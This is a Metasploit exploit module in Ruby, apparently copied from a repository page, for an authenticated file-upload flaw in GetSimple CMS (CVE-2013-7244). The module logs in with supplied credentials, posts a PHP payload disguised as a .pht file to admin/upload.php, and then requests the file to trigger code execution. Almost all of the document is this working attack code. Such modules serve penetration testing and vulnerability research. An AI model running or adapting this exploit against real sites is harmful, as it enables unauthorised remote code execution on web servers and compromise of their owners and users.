jvazquez-r7
118 lines
3.8 KiB
Ruby
118 lines
3.8 KiB
Ruby
##
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
|
|
require 'msf/core'
|
|
require 'msf/core/exploit/php_exe'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'GetSimpleCMS PHP File Upload Vulnerability',
|
|
'Description' => %q{
|
|
This module exploits a file upload vulnerability found in GetSimple CMS
|
|
By abusing the upload.php file, a malicious authenticated user can upload an arbitrary file to a upload
|
|
directory, which results in arbitrary code execution.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Ahmed Elhady Mohamed'
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['CVE', '2013-7244'],
|
|
['OSVDB', '93034']
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'BadChars' => "\x00",
|
|
},
|
|
'Platform' => 'php',
|
|
'Arch' => ARCH_PHP,
|
|
'Targets' =>
|
|
[
|
|
['Generic (PHP Payload)', {}]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Jan 04 2014'
|
|
))
|
|
|
|
register_options([
|
|
OptString.new('TARGETURI', [true, 'The full URI path to GetSimplecms', '/GetSimpleCMS']) ,
|
|
OptString.new('User', [true, 'The username that will be used for authentication process', '']) ,
|
|
OptString.new('Pass', [true, 'The right password for the provided username', '']) ,
|
|
OptString.new('Upload_dir', [true, 'The upload directory, where uploaded files are located', '/data/uploads/'])
|
|
], self.class)
|
|
end
|
|
|
|
|
|
def authenticate_prcoss(peer, uri)
|
|
uri = normalize_uri(uri, "admin", "index.php")
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => "#{uri}",
|
|
'vars_post' => {
|
|
'userid' => "#{datastore['User']}",
|
|
'pwd' => "#{datastore['Pass']}",
|
|
'submitted' => 'Login'
|
|
}
|
|
})
|
|
|
|
fail_with(Failure::Unknown, "#{peer} - Unknown error while authenticating") unless res.code == 302
|
|
|
|
return res
|
|
end
|
|
|
|
|
|
def upload_file(payload_name, uri, cookie_http_header)
|
|
data = Rex::MIME::Message.new
|
|
data.add_part("<?php #{payload.encoded} ?>", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")
|
|
data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")
|
|
|
|
data_post = data.to_s
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(uri, "admin", "upload.php"),
|
|
'vars_get' => { 'path' =>'' },
|
|
'cookie' => cookie_http_header,
|
|
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
|
'data' => data_post
|
|
})
|
|
return res
|
|
end
|
|
|
|
|
|
def exploit
|
|
payload_name = rand_text_alpha(rand(10) + 5) + '.pht'
|
|
uri = target_uri.path
|
|
uri = normalize_uri(uri, '/')
|
|
print_status("#{peer} - Using The Provided Credentials for Authentication.")
|
|
res = authenticate_prcoss(peer, uri)
|
|
print_status("#{peer} - The authentication process is done successfully!")
|
|
|
|
print_status("#{peer} - Extracting Cookies Information")
|
|
cookie_http_header = res.get_cookies
|
|
upload_file(payload_name, uri, cookie_http_header)
|
|
print_status("#{peer} - Uploading #{payload_name.downcase} File.")
|
|
|
|
upload_dir = datastore['Upload_dir']
|
|
upload_uri = normalize_uri(uri, upload_dir, payload_name.downcase)
|
|
|
|
print_status("#{peer} - Executing payload #{payload_name.downcase}")
|
|
send_request_raw({
|
|
'uri' => upload_uri,
|
|
'method' => 'GET'
|
|
}, 5)
|
|
end
|
|
|
|
end
|